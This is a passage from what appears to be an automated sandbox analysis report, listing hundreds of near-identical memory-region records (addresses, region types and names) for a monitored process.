end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5573 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5574 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5577 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5578 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5580 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5581 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5592 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5593 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5597 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5598 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5599 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5600 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5601 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5602 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5603 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5604 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5605 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5606 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5607 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5608 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5612 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5613 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5614 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5615 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5616 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5622 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5623 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5624 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5625 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5638 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5643 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5644 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5645 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5646 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5647 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5663 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5664 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5677 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5678 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5679 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5680 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5681 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5682 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5683 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5687 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5688 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5689 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5692 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5693 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5696 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5697 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5700 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5701 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5702 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5703 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5704 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5705 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5706 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5707 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5708 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5709 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5710 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5711 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5712 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5713 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5714 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5715 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5716 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5717 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5718 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5719 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5720 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5721 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5722 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5723 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5725 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5726 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5728 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5732 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5733 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5734 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5738 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5739 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5740 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5741 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5742 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5743 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5744 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5745 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5746 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5747 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5748 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5750 start_va = 0x610000 end_va = 